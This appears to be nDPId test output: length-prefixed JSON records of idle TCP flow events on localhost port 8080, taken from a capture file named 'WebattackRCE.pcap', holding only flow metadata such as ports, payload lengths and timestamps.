00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7580000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7580000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7580000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7580000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
